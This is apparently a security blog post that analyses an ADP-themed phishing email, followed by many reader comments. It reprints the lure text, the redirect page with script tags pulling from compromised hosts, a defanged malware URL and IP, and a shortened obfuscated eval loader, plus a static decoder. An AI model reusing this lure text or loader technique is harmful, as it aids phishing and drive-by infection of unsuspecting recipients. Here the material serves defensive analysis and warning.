Emails with subject “ADP Funding Notification – Debit Draft” are a security risk


MX Lab, http://www.mxlab.eu, has intercepted some emails with the subject “ADP Funding Notification – Debit Draft” that lead to a malicious web site with obfuscated Javascript code.

The email is sent from the spoofed address “ADP_FSA_Services@ADP.com” or “ADPClientServices@adp.com” and has the following body:

Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.

Thank You,
ADP Benefit Services

The link does not lead to the site named in the message but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html, which serves the following HTML code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>

</html>

Both embedded JavaScript files redirect the browser with document.location='hxxp://173.255.228.171/getfile.php?u=853fda24';

That location serves the obfuscated JavaScript while the browser shows “Waiting for redirect…”.

<html><body><script>try{v=prototype&5;}catch(v){x=1;}z=function(){md="a";if(window.document)e="ev";c="";f="fromChar";
if(a)f=f+"Code";
d=10;
for(i=15027-1;i>=0;i--){
w=i;
v=a[w];
k=v/((15027-i-1)%d+2);
c+=String[f](k);
}
e+="al";
if(x)window[e](c);}
g="";
if(x)g+="472.287.240.240.432.336.230.1375.590.369.384.336.288.280.176.348.198.1111.1140.945.800.707.684.475.4"
______SHORTENED_____
if(x)g+="07.654.585.396.333.200";
a=g.split(".");
z(123);
</script></body></htm>
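
The loop in the sample divides each number by (15027-i-1)%d+2 and reads the array from its last element, so the hidden text can be recovered statically without passing anything to eval. The following is an added example, not code from MX Lab or from the sample: decodeFragment, decodeKnownFragments, HEAD, TAIL and TOTAL are names introduced here, the numbers are the complete values visible in the shortened listing, and HEAD is read as one contiguous run of values.

```javascript
// Added example: static decoder for the numeric encoding used by the sample.
// Nothing is evaluated; numbers are only turned back into text for review.

const TOTAL = 15027; // array length, taken from the sample's loop bound
// First 24 complete values of g as printed in the shortened listing.
const HEAD = "472.287.240.240.432.336.230.1375.590.369.384.336.288.280.176." +
             "348.198.1111.1140.945.800.707.684.475";
// Last 5 complete values of g as printed in the listing.
const TAIL = "654.585.396.333.200";

// fragment:   dot-separated numbers copied from g
// startIndex: index in a[] of the fragment's first number
// total:      length of the full array a[]
// d:          modulus used by the sample (d = 10)
function decodeFragment(fragment, startIndex, total, d = 10) {
  const tokens = fragment.split(".").filter((t) => t.length > 0);
  const chars = [];
  const suspect = [];
  tokens.forEach((tok, n) => {
    const w = startIndex + n;     // position in a[]
    const j = total - 1 - w;      // position in the decoded text
    const divisor = (j % d) + 2;  // the sample's (15027-i-1)%d+2
    const code = Number(tok) / divisor;
    if (!/^\d+$/.test(tok) || !Number.isInteger(code) || code > 0xffff) {
      // A non-integer quotient means a truncated token or a wrong offset.
      suspect.push({ index: w, token: tok });
      chars.push("?");
    } else {
      chars.push(String.fromCharCode(code));
    }
  });
  // The sample reads a[] from its last element down, so reverse.
  return { text: chars.reverse().join(""), suspect };
}

// Decode the two fragments of g that survive in the listing.
function decodeKnownFragments() {
  return {
    start: decodeFragment(TAIL, TOTAL - 5, TOTAL).text, // end of g = start of text
    end: decodeFragment(HEAD, 0, TOTAL).text,           // start of g = end of text
  };
}

console.log(decodeKnownFragments());
// { start: 'docum', end: '_redirect,8000);}spl0();' }
```

Entries returned in suspect mark values that do not divide evenly, which is how a cut-off number or a wrong array length shows up during analysis.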

104 thoughts on “Emails with subject “ADP Funding Notification – Debit Draft” are a security risk”

  1. got this message today. the spooky part is they emailed me and cc’d my business partner so it took some smarts to put all that together.

  2. thanks for the info. I received 2 emails within 30 minutes of each other. Thankfully my malware would not let me access the website.

    • I also received this on 29/9/2012 and they also debited our business account on the 4th October 2012 and I am now trying to get them to put the money back. never signed up for this either.

      • Guys please tell me will they actually debit my account, anyone there who lost money due to this silly thing? am going to run to the bank & transfer my money to another account OMG am so freaked out. We don’t have privacy in this cruel world😦

      • I have received this email today 13/10/12 on my iPad and it is a weekend however am freaked out as to whether they will take money from my account. I have never heard of these people. Who do I report this to?

      • I received this on October 15 and they managed to take $175.00 from my checking account. I disputed it with my bank and after checking they say it is “legitimate”, but I am contesting that and requiring them to send me the documentation. This is a nightmare. I think I should change my checking account because I’m afraid it will happen again monthly every month on the 15th? Has anyone had any luck getting their bank to reverse these charges permanently. Fifth Third only reversed it for 30 days then put it back on again when they said it was “legitimate.” Bulls^*#( this was NEVER authorized by me.

  3. I wanted to say thanks as well. I suspected it to be a phishing email, but it’s nice to be able to get such quick validation through sites like this.

  4. This is what I love about the internet. I just got one of these and the watchdogs are already on it. Thanks

  5. My ADP Email had the subject-line. ADP Generated Message: First Notice – Digital Certificate Expiration. I am relieved to find this support site. I still don’t know how to truly avoid these invaders as they become more and more sneaky in faking an authentic-looking address.

  6. this went into our regular email as ADPClientServices, did not look right so I called ADP directly I was informed they would never send an email with another link it would be directly to their website. SO Delete, Delete, Delete!

  7. got a similar email today @ 3.17 p.m. Searched internet and found this discussion. Thanks to everybody who has posted. It does help a lot in weeding out the spam emails.

  8. Is there an address to forward these spam e-mails to? I get them quite frequently, from PayPal too. They have me forward the fraudulent messages to “Spoof@paypal.com”

  9. I am glad I decided to Google who ADP was. I got this email on an infrequently used email so when it said it was going to debit my account, I was suspicious but didn’t want to click the link before checking out who the company was. Thank you posting this!

  10. I received one today as well, but realized it was a bogus email when I opened the “show details” and saw that it was sent to other emails that started with “gina”. googled the site and brought here. thank you.

  11. I just received an email to my .mac account. Got concerned so did some research. Thank you for those who did all the research before I had to. I’m sick of these spammers. How do we stop the madness?

    • I received one email from them today and I read your post that help me to know that it is a SPAM but I don’t know which account could be debited if I didn’t subscribe on anything with them… Is it only if you click on their link ? Is it on a credit card account or a bank account ? Thank you !

  12. Thank you all for posting this answer. I had just received the same email. I kinda figured it was a phishing scam so I Googled it before opening it and was happy to see all the post. Thanks!

  13. I also got one today…scary thing is I did have an ADP account through work but this email went straight to my spam box. Gonna forward it as well. Thanks for the info

  14. Had 2 of these spams in the past few days. One with Subject line “Debit Draft”, and the other “ADP Generated Message – Debit Draft”. Thanks for confirming my suspicions!

  15. I have received many of these messages in recent days to I have not done them case; But today I get other BBB where tell me that my business has a complaint for failure to pay the ADP service.

  16. I have received this email. Thankfully I googled it and found this site. Have deleted message now.
    Many thanks/
    Dave

  17. I’m getting three or four a day now, all from America, I been downgraded on their business ratings and now offered diplomas How can we stop these, I’m not sure how to block E-mails and my ESP are no help

  18. Also got this message twice In my spam mail. Never signed up for this! Will keep watch on my bank account for this just to be safe!

  19. Today I received the same message from ‘ADP Alert ‘ with the following body:

    Your Transaction Report(s) have been uploaded to the web site:

    https://www.flexdirect.adp.com/client/login.aspx

    Please note that your bank account will be debited within one banking
    business day for the amount(s) shown on the report(s).

    Please do not respond or reply to this automated e-mail. If you have any
    questions or comments, please Contact your ADP Benefits Specialist.

    Thank You,
    ADP Benefit Services

    Should I inform to bank.

  20. Good day, friends. I received the same messages. They say that I have a bank account. They say that money will be withdrawn. What is this? What do you think about this? Regards.

  21. Scary isn’t it. It appears we don’t touch it, straight up delete … single digit finger high in the air, to the swine that got our details to send. I’m glad I searched here first. I live on the same road, wondering what knowledge they have of my banking details and whether I should notify the bank. I’ll watch for someone’s savvy reply.

  22. Yea…. got the same here … but was in my spam folder
    with this message attached:
    “Be careful with this message. Our systems couldn’t verify that this message was really sent by cparkerproperties.com. You might want to avoid clicking on links or replying with personal information. Learn more”

    so googled “https://www.flexdirect.adp.com” and came up with these notifications……

    looks like they are using various email addys to send now/……….
    r

  23. ADP does our payroll, and it was sent to my work email, which I don’t share anywhere but professional sites, so this was concerning. Now I wonder which company is “leaking” my contact info😦

  24. I got the same e-mail.. but I clicked the link that sites on my mobile phone… is it okay? I am so nervous..:(

  25. I just received this email today and I’m so glad I googled it. Thank you. Immediately deleted it and added seller to spam.

  26. I received this today as well and have never had anything to do with ADP – I don’t even live in America. This is clearly spam/phishing attempts so it got deleted straight away, but it is rather scary how these people find and target you… Googled ADP however and it led me here, so thanks for the information. Be safe on the Internet.

  27. Yeah great work all, I poked around after getting this as well. They almost got me too because I just put in for a small business loan and I thought it had something to do with that lol always pays to look first!!

    • To all those worried about their bank accounts, from this email I would not worry. If they did already have your bank information they would not require you to click a link, they would just pretend to be some fake company and do an ACH withdraw on your account. Just be careful and google/delete any email that seem a little shady!

      • I would definitely worry if I were you. I got the fake email and clicked on it because my previous employer used ADP so I thought it was legit. I’ve had $175.00 take “automatically debit” from my checking account in October. Did a “dispute” with my bank (Fifth Third) and they reversed it for 30 days while checking into it. Then they reversed it again and re-debited my account for the $175.00 because they said it was legit. I’m further disputing and asking for documentation. This is a nightmare!

  28. I clicked on the link like an idiot, and immediately disconnected from the internet and ran my virus scan which has found nothing. I then searched the internet and found you… I should have searched first…

  29. I got this also but gmail put it directly in the spam and listed it with a warning. The warning directly mentioned not clicking any links in the email lol. I wouldn’t anyhow I didn’t recognize it and if they charged the bank I could easily dispute the charges anyhow.

  30. I got this mail twice today. Please can anyone tell me, will they really debit my account?? I haven’t signed up for this & have never heard of or dealt with ADP before! There’s a link also but I didn’t click on it

  31. Thanks for this site , a lot of people are scammed, but because of your dedication we can stay away from this kind of nonsense.. I am usually very careful and would not open emails that do not make sense..
    KUDOS people!!!!!

  32. Received this spam today. This is work email account and the only thing I have used it for lately was to post a job on Craigslist. ???????????????????
    Thanks for your help.

  33. I received this email today and clicked on the link, don’t know what I was thinking as I never open emails that I don’t trust, hope it does not take anything from my account

  34. Received a modified version this morning: 2 emails with “ADP Funding Notification” and “ADP Debit Draft” subject lines. The source and hyperlinks are different but essentially the same issue. Both display a hyperlink of “https://www.flexdirect.adp.com/client/login.aspx” but actually link to “hxxp://www.annorlimousine.com/4b2kMN/index.html” and “hxxp://daglimobilya.com/7dc5WT/index.html” respectively. I copy and paste links, I NEVER click a link in an email, especially one that is questionable. I contacted ADP and while on hold, found this blog and then they answered to confirm many have received such emails. This email originated from 109.93.41.77 (Serbia) according to the message header.

  35. I’ve just got one too. I got worried not knowing who the company was and or how much was being debited from my account I clicked the link and it said ‘server’ in the top left corner so I clicked for the properties and it looked dodgy, was out of date and wouldn’t show certificates so I’ve closed it and googled it and came to this site… thanks very much everyone.
    Does anyone know if im at risk because i clicked the link even though it didn’t load??

    • I just got one of these in my junk mail. Totally confused as ADP is the name of my dentist! Clicked in link on my phone it came up forbidden. Thank god. I googled and found these comments. Thanks all for posting.

    • @SaraCornell It fell into my Gmail spam folder but I looked at it in any case. Suspicions instantly raised by the lack of addressee or signature. Quick tip – copy and paste a key phrase of many words from the email and google it (perhaps adding the word “spam” to the search argument) if you’re uncertain – such action will lead you straight to sites like this one that help. I googled the link itself(!) and got this page. Quick tip number 2 – don’t click on links. Quick tip 3 – if your malware/AV scanner didn’t block the link, run a malware scan *now* from http://www.microsoft.com/security/scanner/en-gb/default.aspx (don’t trust this link? – search for “Microsoft Safety Scanner”) and upgrade your system to an AV/malware app that does work. ATB @PedroStephano

  36. Well now , nice to know we are not alone when problems hit us. However at 74 I still got me marbles and can punch these sort of things into touch, whilst not using the queens english .
    Thanks to this site set up I can refer my friends to check anything that is suspicious. Many thanks Google.

  37. Just got one today, too. I don’t even know who ADP is. I will be going to my bank tomorrow morning to let them know to watch out for these nuts who are trying to steal my hard-earned money. This makes me nervous and angry!!! How dare they??? I am glad I found you all through Google. What a mess!!

  38. Just like many others on this page I received one of these emails today. Googled it and found you guys. Thanks for confirming my suspicions! Great site.

  39. Received this today, opened, and after seeing that I was forbidden to open link, decided to search. Am I at risk? My credit unions are closed today, except for drive-thru…do I print this out and take it to them??? Do I have to worry about my tiny bank account? They’ll be pretty disappointed when they see what’s in there?? Do they want my last $10.00?? I also received an e-mail from “Wire Transfer Confirmation (FED_7811t33836)….is this related??

  40. I received same on 12th October & left in “Junk”. Didn’t do anything with it until today. Googled & found you, so have deleted without going to link. Thanks for the info.

  41. Received 2 emails on this ADP Funding Notification which I am not familiar with. I have called my bank and apparently they are also not sure about this ADP Funding Notification. My advice to delete and totally ignore this email.

  42. Same here, got one yesterday and did not click on anything. First thing this morning, notified my bank to NOT actuate any transaction without my specific consent. They had never heard of this spam. Glad I found this site when I googled the ADPClient Services. Pheew!!

  43. Thanks to the person/persons who set up this site and to everyone who posted about ADP e-mail. I found it in my spam folder and as in the middle of setting up a business and dealing with a lot of stuff thought a ‘proper’ message had slipped into spam folder. Stupidly (specially stupid of me as I’m an IT contractor!!) clicked on the link and thankfully got internet can’t open this page message – phew! Googled and found this site.

  44. hello,

    I opened this message and tried to reply but bounced back….I am now concerned that someone may have my details is this possible?? esp if it bounced back.

    the email contained adp will be debiting my account within one working day can someone help?

  45. This is the one that I got…
    Your latest ADP Services Invoice is now available to view or pay online at ADP Online Invoice Management .

    To protect the security of your data, you will need to enter your ID and password, then click on Access your Online Invoice Management Account.

    Total amount due by October 11, 2012

    $42571.85

    If you have already sent your payment please disregard this friendly reminder and Thank you for choosing ADP.

    Questions about your bill?

    Contact your ADP administrator by Secure Mail.

    Note: This is an automated email. Please do not reply.

    They don’t have to worry about me replying…..or paying either!! Sure hope that nobody gets duped by this

  46. Just got that email–although when I hovered over the link, it went to some wholesaleshoewarehouse dot something.. I didn’t click of course!!

  47. Well..I received mine on Oct 12 and decided to clean my mailbox this morning before work. I, like an idiot clicked it cause I couldn’t figure out what amt they were talking about because I hadn’t transferred any money for about 3 weeks. The page that came up was a “page cannot be found” page. So I hope I am safe here. I’m usually not that stupid….but that’s what happens when you clean your box at 5 a.m. and forget to have coffee first. Thanks to the watchdogs Debbie Vancouver Island Canada

  48. we got one in Oct. Didn’t lose anything. There are so many bad people. Glad I found you today.

  49. I just got one of these on my work email. I have never signed up for this, so how do I know if my account is okay? I did not click on the link so they have no valuable information as far as I know. Should I email my bank?
